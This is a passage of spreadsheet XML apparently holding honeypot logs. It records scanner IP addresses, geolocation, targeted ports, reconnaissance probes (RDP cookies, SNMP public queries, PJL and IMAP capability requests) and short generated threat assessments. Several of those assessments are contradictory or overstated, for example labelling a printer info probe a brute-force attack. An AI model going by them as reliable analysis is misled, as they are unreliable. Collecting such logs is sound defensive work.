    <t>62039afad8cab888e86e966d6e62ee21</t>
  </si>
  <si>
    <t>117.251.180.18</t>
  </si>
  <si>
    <t>::ffff:75fb:b412</t>
  </si>
  <si>
    <t>9a3ca5c9e331d8f58f2cefa12bc7ed0e</t>
  </si>
  <si>
    <t>37.115.84.97</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;19133&amp;&amp;39002&amp;&amp;NA</t>
  </si>
  <si>
    <t>30</t>
  </si>
  <si>
    <t>Kyiv City</t>
  </si>
  <si>
    <t>703448</t>
  </si>
  <si>
    <t>50.4504</t>
  </si>
  <si>
    <t>30.5245</t>
  </si>
  <si>
    <t>15895</t>
  </si>
  <si>
    <t>Kyivstar PJSC</t>
  </si>
  <si>
    <t>Kyivstar GSM</t>
  </si>
  <si>
    <t>2012-02-10</t>
  </si>
  <si>
    <t>::ffff:2573:5461</t>
  </si>
  <si>
    <t>9c8989b3a0aa9c5ebc47a667d9c67388</t>
  </si>
  <si>
    <t>46.119.228.83</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;30732&amp;&amp;52897&amp;&amp;39137&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2e77:e453</t>
  </si>
  <si>
    <t>3009d698d5d7817da352419e0847a707</t>
  </si>
  <si>
    <t>147.185.132.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_NTP_H23&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_REDIS_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;35946&amp;&amp;NA&amp;&amp;1433&amp;&amp;3306&amp;&amp;5432&amp;&amp;3389&amp;&amp;443&amp;&amp;110&amp;&amp;53073&amp;&amp;23&amp;&amp;22&amp;&amp;55051&amp;&amp;161&amp;&amp;16150&amp;&amp;9100&amp;&amp;60130&amp;&amp;80&amp;&amp;1080&amp;&amp;52785&amp;&amp;6379&amp;&amp;5900&amp;&amp;389&amp;&amp;143&amp;&amp;21&amp;&amp;445&amp;&amp;62632&amp;&amp;6667&amp;&amp;50063&amp;&amp;51722&amp;&amp;54909</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kqvLPLQAs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XHzRYm'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WLkBOcrqx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WwUQLC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lfLgQh'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65294)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65296)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,65310)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58348)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58350)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,58356)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RKEkjJKyf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nEaSVo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Gxyfox'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AiQmVtVTW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bBXTyb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uDNFFG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jTEhYpNsv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sagbSH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=irblmu'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61734)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61740)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,61742)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62134)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62144)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62148)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aGyLBhYwA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YmQvaL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=Hmfkhi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gABzQouxK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EVBaHR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iVlnNj'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62686)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62692)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62704)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=diAiMReey'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HosgKs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hHeAal'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LZokIcixx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RJyHGb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VGMOCs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IGdYBDsYc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KOUpxm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NfJrrV'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62460)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62476)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,62482)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=icMFGvQWz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eDdUHd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XGXdDg'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.118,63096)}</t>
  </si>
  <si>
    <t>::ffff:93b9:8476</t>
  </si>
  <si>
    <t>This suggests an attempt to connect to an IMAP service without providing any credentials or authentication information, potentially indicating a brute-force attack or port scanning activity. This is likely an attempt to gather information about the target system's services and configuration. The attacker may be trying to identify potential vulnerabilities in the IMAP service. &amp;&amp; A potential malicious activity of an external system attempting to connect to a service on the monitored network using SMB protocol from IP address 147.185.132.118 with port number 63096. This may indicate a brute-force or unauthorized access attempt. The source's intentions could be malicious. &amp;&amp; Possible malicious activity is an incoming SMB connection from IP address 147.185.132.118 to port 63,096, which could be a sign of unauthorized access or potential exploitation. 
This may indicate a brute force attack or scanning for vulnerabilities. 
It might also be a malicious actor trying to gain access to the system through SMB services. &amp;&amp; The data indicates an attempt to retrieve server capabilities, which could be a reconnaissance step by malicious actors to gather information about the system. This is often used as a precursor to other attacks, such as password cracking or exploit attempts. It may also indicate a brute-force attack or a scanning activity. &amp;&amp; No activity detected, likely due to NTP service being inactive or inaccessible at that time. No malicious attempts were observed during this period. Normal operation assumed. &amp;&amp; This log indicates an attempt to access Remote Desktop Protocol (RDP) services without providing valid credentials or authentication, which could be a brute force login attack. The lack of "NA" value suggests that no activity was detected on the RDP service.</t>
  </si>
  <si>
    <t>25cd4b3cc2bc9573e97fdf70165fe8b1</t>
  </si>
  <si>
    <t>61.2.155.208</t>
  </si>
  <si>
    <t>Bengaluru (RajajiNagar)</t>
  </si>
  <si>
    <t>560010</t>
  </si>
  <si>
    <t>13.0123</t>
  </si>
  <si>
    <t>77.5558</t>
  </si>
  <si>
    <t>Quadgen WiFi Project C/O Addl GM P3 Bangalore</t>
  </si>
  <si>
    <t>::ffff:3d02:9bd0</t>
  </si>
  <si>
    <t>7e6230fac1ab1620194b6c7c85b7a6ed</t>
  </si>
  <si>
    <t>218.153.161.181</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>2001-09-24</t>
  </si>
  <si>
    <t>::ffff:da99:a1b5</t>
  </si>
  <si>
    <t>No activity detected in this log entry, but it means that there was no attempt to access or interact with the telnet service. This is an indication of no malicious activity in relation to the telnet service. Nothing suspicious occurred.</t>
  </si>
  <si>
    <t>0973c90cd770125fc0c443af33776e50</t>
  </si>
  <si>
    <t>120.56.158.166</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>::ffff:7838:9ea6</t>
  </si>
  <si>
    <t>14fc1fdd47b916012d3a097de11f832a</t>
  </si>
  <si>
    <t>198.235.24.35</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_MYSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1521&amp;&amp;6379&amp;&amp;1433&amp;&amp;NA&amp;&amp;23&amp;&amp;161&amp;&amp;6067&amp;&amp;5432&amp;&amp;3389&amp;&amp;21&amp;&amp;143&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;1080&amp;&amp;62278&amp;&amp;445&amp;&amp;80&amp;&amp;51499</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mgYbqwQhK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HFVtMy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HQsdxY'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61720)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61722)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61732)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,63148)}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1823</t>
  </si>
  <si>
    <t>Possible brute-force attack attempt, where an attacker is trying to guess credentials for PJL service access without success.</t>
  </si>
  <si>
    <t>f8b01ddbd229fee0508237208b0bd8b8</t>
  </si>
  <si>
    <t>14.228.209.124</t>
  </si>
  <si>
    <t>VNPT</t>
  </si>
  <si>
    <t>2010-08-16</t>
  </si>
  <si>
    <t>::ffff:ee4:d17c</t>
  </si>
  <si>
    <t>56a1a5902221336fb2fbc03ef5acdaf0</t>
  </si>
  <si>
    <t>117.251.174.12</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>28923&amp;&amp;23</t>
  </si>
  <si>
    <t>BSNLNET</t>
  </si>
  <si>
    <t>::ffff:75fb:ae0c</t>
  </si>
  <si>
    <t>dc89a1862429506b39143ec2b2d84c9b</t>
  </si>
  <si>
    <t>147.185.132.87</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SIP_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_NTP_H13&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_SNMP_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;35225&amp;&amp;1521&amp;&amp;23&amp;&amp;6379&amp;&amp;22&amp;&amp;36512&amp;&amp;80&amp;&amp;389&amp;&amp;55424&amp;&amp;143&amp;&amp;NA&amp;&amp;445&amp;&amp;29787&amp;&amp;6667&amp;&amp;3389&amp;&amp;51301&amp;&amp;110&amp;&amp;1433&amp;&amp;51107&amp;&amp;9100&amp;&amp;161&amp;&amp;3306&amp;&amp;5900&amp;&amp;5432&amp;&amp;52085&amp;&amp;443&amp;&amp;52416&amp;&amp;51766&amp;&amp;50392&amp;&amp;21&amp;&amp;53923&amp;&amp;52165&amp;&amp;52539&amp;&amp;1080&amp;&amp;53359&amp;&amp;52121&amp;&amp;55456</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;request&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mngtKmTvb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YxKzQx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GrYLDZ'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HiZYUJmOW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VmYWYU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aMwXNZ'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fzsSJkRns'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CLLlzY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BlHWDp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nSXgCNfcX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wXOnpq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cjwJCa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MeghWsaTt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cAgvtR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: 